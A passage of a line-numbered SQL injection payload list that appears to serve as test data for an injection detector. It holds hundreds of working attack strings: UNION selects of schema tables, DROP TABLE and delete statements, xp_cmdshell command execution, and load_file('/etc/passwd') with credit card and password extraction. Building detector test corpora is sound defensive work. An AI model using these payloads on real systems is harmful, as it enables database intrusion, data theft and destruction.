VARCHAR(4000) SET @S 395 | 396 | ' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE 397 | 398 | # https://twitter.com/st1ll_di3/status/344416764949561346 399 | # http://pastebin.com/Ymcs7nE0 400 | (--- 0)'=(currenT_user()-3) union select 1,2,3 from users; -- - 401 | 402 | # example from http://www.websec.ca/kb/sql_injection 403 | 1=1 AND-+-+-+-+~~((1)) 404 | 405 | # the bizarre sp_password hackery 406 | 1-- foo sp_password 407 | 1'--sp_password 408 | 409 | # nice ms-access, courtesy mod-security 410 | foo' Eqv StrComp(username, 0x12+0x34+0xab+0xcd,0) Imp 'a 411 | 412 | # mysql and 
pgsql string literals 413 | b'1' UNION SELECT 1 414 | x'1' UNION SELECT 1 415 | n'1' UNION SELECT 1 416 | 417 | # ending clauses 418 | 1 having 1 limit 1 union select 1-- 419 | 1 having (1) limit 1 union select 1-- 420 | 1 having -(1) limit 1 union select 1-- 421 | 1 having sin(1) limit 1 union select 1-- 422 | 1 having 1 limit 2 group by 3 union select 1-- 423 | 1 group by 2 union select 1 -- 424 | sin(1) group by 1 union select 1-- 425 | @version group by 1 union select 1-- 426 | @version group by (-1) union select 1-- 427 | (@version) group by -1 union select 1-- 428 | (@version) group by (-1) union select 1-- 429 | (@version)) group by (-1) union select 1-- 430 | (1)) group by (-1) union select 1-- 431 | (@version) group by sin(-1) union select 1-- 432 | 1 group by sin(1) union select 1-- 433 | 1 group by 1 - sin(1) union select 1-- 434 | 1 group by (sin(1)) union select 1-- 435 | -1 group by -(-sin(1)) union select 1-- 436 | sin(1) group by (-sin(1)) union select 1-- 437 | sin(1)-1 group by (-sin(1)) union select 1-- 438 | sin(1)-1 group by 1 union select 1-- 439 | 1 group by ((1)) union select 1-- 440 | 1 group by (((1))) union select 1-- 441 | ((1)) group by (1) union select 1-- 442 | (1) group by ((1)) union select 1-- 443 | (1) group by (1) union select 1-- 444 | 445 | # more with 'having' 446 | -(1) is not unknown having 1 order by 1 limit 1 for update UNION select table_name from information_schema.tables limit 1 447 | -(1) is not unknown UNION select table_name from information_schema.tables limit 1 448 | -(1) is not unknown for update UNION select table_name from information_schema.tables limit 1 449 | -(1) is not unknown having 1 order by 1 limit 1 UNION select table_name from information_schema.tables limit 1 450 | -(1) is not unknown having 1 UNION select table_name from information_schema.tables limit 1 451 | -(1) is not unknown UNION select table_name from information_schema.tables limit 1 452 | -(1) is not unknown having 1 UNION select 
table_name from information_schema.tables limit 1 453 | -(1) is unknown having 1 UNION select table_name from information_schema.tables limit 1 454 | -(1) for update UNION select table_name from information_schema.tables limit 1 455 | 1 for update UNION select table_name from information_schema.tables limit 1 456 | 457 | -(1) for update UNION select table_name from information_schema.tables limit 1 458 | -(true) for update UNION select table_name from information_schema.tables limit 1 459 | -(null) for update UNION select table_name from information_schema.tables limit 1 460 | -(\N) for update UNION select table_name from information_schema.tables limit 1 461 | -(\N) for update having true UNION select table_name from information_schema.tables limit 1 462 | -(\N) for update having 1 UNION select table_name from information_schema.tables limit 1 463 | -(1) for update having 1 UNION select table_name from information_schema.tables limit 1 464 | -(1) having 1 for updateUNION select table_name from information_schema.tables limit 1 465 | -(1) having 1 for update UNION select table_name from information_schema.tables limit 1 466 | -(1) having 1 for update UNION select table_name from information_schema.tables limit 1 467 | 468 | \''; DROP TABLE users; -- 469 | \''); DROP TABLE users; -- 470 | \''; /* one */ ;DROP TABLE users; -- 471 | \''; select 1; drop table users; -- 472 | 1; USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck 473 | 1; EXECUTE AS LOGIN 'root'; GO xp_cmdshell 'whoami.exe' ; REVERT ; 474 | 1; USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck 475 | 1); USE master; EXEC xp_cmdshell 'copy c:\SQLbcks\AdvWorks.bck 476 | 477 | EXEC sp_add_job @job_name = 'TestJob'; 478 | EXECUTE sp_add_job @job_name = 'TestJob'; 479 | 1;EXECUTE sp_add_job @job_name = 'TestJob'; 480 | 1;print 'foo'; exec xp_cmdshell 'destroy'; 481 | 482 | # nested sub-selects 483 | -1 - (select (1 - select (select 1))) union all select 2 -- 484 | -1 - (select 1) - union all 
select 2 -- 485 | (select 1) - 1 union all select 2 -- 486 | ((select 1) - 1) + (select 1) union all select 2 -- 487 | (select (select (select 1))) union all select 2 -- 488 | (select (select (select 1))) union all select 2 -- 489 | (select ((select (select 1))) union all select 2 -- 490 | (select (select ((select 1))) union all select 2 -- 491 | (select ((select 1 - (select 1))) union all select 2 -- 492 | (select (select (((select 1))) union all select 2 -- 493 | (select ((select (select 1))) union all select 2 -- 494 | (select (((select (select 1))) union all select 2 -- 495 | (select (select (1 - select 1))) union all select 2 -- 496 | (select (select 1 - (select 1))) union all select 2 -- 497 | (select 1 - (select 1 - (select 1))) union all select 2 -- 498 | 499 | # moar unions 500 | -1 union distinct select table_name from information_schema.tables 501 | -1 union distinct all select table_name from information_schema.tables 502 | -1 union all distinct select table_name from information_schema.tables 503 | -1 union all select table_name from information_schema.tables 504 | 505 | # more 506 | if(1, -1, 2) union select table_name from information_schema.tables limit 1 507 | if((1), -1, 2) union select table_name from information_schema.tables limit 1 508 | if(1=2, -1, 2) union select table_name from information_schema.tables limit 1 509 | true in(2, (select 2)) union select table_name from information_schema.tables limit 1 510 | true in(2, 1) union select table_name from information_schema.tables limit 1 511 | 512 | # 513 | -1 union select current_user``union select table_name from information_schema.tables 514 | 515 | if(1, 1, 2) union select 3 516 | if(sin(1), 1, 2) union select 3 517 | if(1, sin(1), 2) union select 3 518 | if(1 - sin(1), 2) union select 3 519 | if((1), 1, 2) union select 3 520 | if(-(1), 1, 2) union select 3 521 | 522 | # 523 | 1; if exists ( /* anything */ 524 | 525 | # these aren't SQL but close enough 526 | union (select 1)-- 527 | union 
all (select 1)-- 528 | union all (select distinct 1)-- 529 | union (select 1,2,3,4,5)-- 530 | union (select -1,2,3,4,5)-- 531 | union (select -(1),2,3,4,5)-- 532 | union (select -sin(1),2,3,4,5)-- 533 | 1;call p(@version, @a) 534 | 1;load data infile "foo" 535 | 1;load xml infile "foo" 536 | 1;load xml local infile "foo" 537 | 1;load xml low_priority infile "foo" 538 | 1;load xml concurrent infile "foo" 539 | 1; delete from foo 540 | 1; delete low_priority from foo 541 | 1; delete quick from foo 542 | 1; delete ignore from foo 543 | 544 | 545 | 1;do (1=1) 546 | 547 | -0b01 for update union select table_name from information_schema.tables limit 1 548 | binary _latin1 'true' COLLATE latin1_german2_ci is not unknown union select table_name from information_schema.tables 549 | binary true COLLATE latin1_german2_ci union select table_name from information_schema.tables 550 | 12 union select table_name from information_schema.tables limit 1 551 | binary 1 < binary 2 > binary 3 union select table_name from information_schema.tables limit 1 552 | 553 | binary (false) union select table_name from information_schema.tables limit 1 554 | 1 - binary (false) union select table_name from information_schema.tables limit 1 555 | 1 - (binary (false)) union select table_name from information_schema.tables limit 1 556 | binary binary 1 union select table_name from information_schema.tables 557 | binary -1 union select table_name from information_schema.tables 558 | binary -(1) union select table_name from information_schema.tables 559 | binary (binary 1) union select table_name from information_schema.tables 560 | binary (binary 1) union select table_name from information_schema.tables 561 | 562 | # weird slash escaping in older T-SQL databases 563 | # http://websec.ca/kb/sql_injection#MSSQL_Allowed_Intermediary_Chars_AND-OR 564 | \1=\1AND\1=\1; 565 | 566 | # more weird T-SQL weirdness 567 | \%250=\-1AND\*1=\/1 568 | 569 | # mysql 570 | -1 procedure analyse() union select table_name 
from information_schema.tables limit 1 571 | 572 | # HT @FluxReiners 573 | (1)mod @a or 1 union select load_file('/etc/passwd'),credit_card,passwd from users-- - 574 | @a mod (1) or 1 union select load_file('/etc/passwd'),credit_card,passwd from users-- - 575 | 576 | # HT @LightOS 577 | # The issue here is how '1gfsdg...' is parsed. 578 | # MySQL parses it as a single word; other databases treat it as "1", "gfs..." 579 | -1 procedure analyse(1gfsdgfds, sfg) union select table_name from information_schema.tables limit 1 580 | 581 | # HT @FluxReiners 582 | (select 1 foo) union select load_file('foo'); 583 | 584 | # 585 | # Anonymous from Research Institution of Telecom in Beijing, China 586 | # Commented out since I have no idea how this could be a true SQL injection 587 | #=1 union select admin,pass from admin limit 1 588 | #=1 union select 1,2,3,4,5,6 589 | 590 | # problems with type casting, including nested type casts 591 | # 592 | # credit: Reto Ischi 593 | # 594 | 's' || binary(1)# and n='foo" 595 | 1 - binary (1 - binary(1)) UNION SELECT 2 -- 596 | 1 - binary (binary(1) -1) UNION SELECT 2 -- 597 | binary (1 - binary(1)) UNION SELECT 2 -- 598 | binary (binary(1) - 1) UNION SELECT 2 -- 599 | binary (binary(1)) UNION SELECT 2 -- 600 | 601 | # 602 | # Padding using the BETWEEN operator 603 | # 604 | (1 between @version and "2") & 1 UNION SELECT 1 605 | (1 between @version and @user) & 1 UNION SELECT 1 606 | (1 between 1 and @version) & 1 UNION SELECT 1 607 | (1 between '1' and @version) & 1 UNION SELECT 1 608 | (1 between 1 and 2) & 1 UNION SELECT 1 609 | (1 between '1' and '2') & 1 UNION SELECT 1 610 | (1 between 1 and '2') & 1 UNION SELECT 1 611 | (1 between '1' and 2) & 1 UNION SELECT 1 612 | ('1' between '1' and '2') & 1 UNION SELECT 1 613 | (@version between '1' and '2') & 1 UNION SELECT 1 614 | (@version between 1 and '2') & 1 UNION SELECT 1 615 | 616 | # 617 | # ANY and SOME subqueries 618 | # 619 | 1 - ANY(SELECT 1,2) 620 | ANY(SELECT 1) - 1 UNION ALL -- 621 | 
ANY(SELECT (1)) - 1 UNION ALL -- 622 | ANY((SELECT 1)) - 1 UNION ALL -- 623 | 1 - ANY(SELECT 1) UNION ALL -- 624 | 625 | # 626 | # embedded %A0 mysql 627 | # 628 | 1%A0UNION%A0SELECT%A02-- 629 | 1%00UNION%00SELECT%002-- 630 | 631 | # 632 | # http://www.exploit-db.com/exploits/28854/ 633 | # 634 | stringindatasetchoosen%25' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%25dministrator' and rownum<=1 and PASSWORD like '0%25') and '1%25'='1 635 | 636 | # 637 | # Thanks to @rsalgado 638 | # A degenerate MySQL ODBC case 639 | # 640 | -{``.``.id} union select table_name FROM information_schema.tables LIMIT 1 641 | --------------------------------------------------------------------------------
